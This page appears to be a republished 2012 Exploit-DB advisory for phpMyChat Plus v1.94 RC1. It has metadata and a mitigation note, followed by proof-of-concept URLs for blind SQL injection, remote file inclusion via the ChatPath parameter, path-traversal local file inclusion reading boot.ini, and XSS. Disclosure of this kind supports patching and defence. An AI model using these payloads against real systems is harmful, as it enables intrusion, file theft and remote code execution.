phpMyChat Plus v1.94 RC1 Multiple Remote Vulnerabilities

vendor:

phpMyChat Plus

by:

L0n3ly-H34rT

8,8

CVSS

HIGH

Remote Blind SQL Injection, Remote File Inclusion, Local File Inclusion, XSS

89, 94, 98, 79

CWE

Product Name: phpMyChat Plus

Affected Version From: 1.94 RC1

Affected Version To: 1.94 RC1

Patch Exists: YES

Related CWE: N/A

CPE: a:phpmychat:phpmychat_plus

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Linux/Windows

2012

phpMyChat Plus v1.94 RC1 Multiple Remote Vulnerabilities

The phpMyChat Plus v1.94 RC1 is vulnerable to Remote Blind SQL Injection, Remote File Inclusion, Local File Inclusion, and XSS. For Remote Blind SQL Injection, an attacker can use some automatic blind SQL injection to get database information. For Remote File Inclusion, the allow_url_include must be set to On. For Local File Inclusion, the magic_quotes_gpc must be set to Off. For XSS, an attacker must have a good brain.

Mitigation:

To mitigate Remote Blind SQL Injection, Remote File Inclusion, Local File Inclusion, and XSS, the user should ensure that the allow_url_include is set to Off, the magic_quotes_gpc is set to On, and that all user input is properly sanitized.

Source

Exploit-DB raw data:

############################################
### Exploit Title: phpMyChat Plus v1.94 RC1 Multiple Remote Vulnerabilities
### Date: 04/10/2012 
### Author: L0n3ly-H34rT 
### Contact: l0n3ly_h34rt@hotmail.com 
### My Site: http://se3c.blogspot.com/ 
### Vendor Link: http://sourceforge.net/projects/phpmychat/
### Software Link: http://sourceforge.net/projects/phpmychat/files/latest/download
### Version: 1.94 RC1
### Tested on: Linux/Windows 
############################################

1- Remote Blind SQL Injection :

# P.O.C :

http://localhost/plus/users_popuph.php?B=1&From=remotelogin.php&L=hebrew&LastCheck=[Blind SQL]

----------------------------------------------------------------------------------------

2- Remote File Inclusion :

# P.O.C :

http://localhost/plus/install/old/install.php?ChatPath=http://127.0.0.1/c.txt?

----------------------------------------------------------------------------------------

3- Local File Inclusion :

- Based on this exploit :

http://www.exploit-db.com/exploits/17213/

# P.O.C :

http://localhost/plus/install/old/install.php?ChatPath=../../../../../../boot.ini%00

http://localhost/plus/install/old/install.php?L=../../../../../../boot.ini%00

---------------------------------------------------------------------------------------

4- XSS :

# P.O.C :

http://localhost/plus/input.php?D=20&From=remotelogin.php&L=serbian_latin&N=10&NT=1&O=1&R=Public Room 1&ST=1&T=1&U=[XSS]&Ver=H

http://localhost/plus/users_popuph.php?B=1&From=remotelogin.php&L=chinese_traditional&LastCheck=[XSS]


############################################

# Notes :

1- For Remote Blind SQL Injection ( you can use some automatic blind sql injection to get database informations ).

2- For Remote File Inclusion ( must be allow_url_include=On ).

3- For Local File Inclusion ( must be magic_quotes_gpc = Off )

4- For XSS ( you must have a good brain :p )

# Greetz to my friendz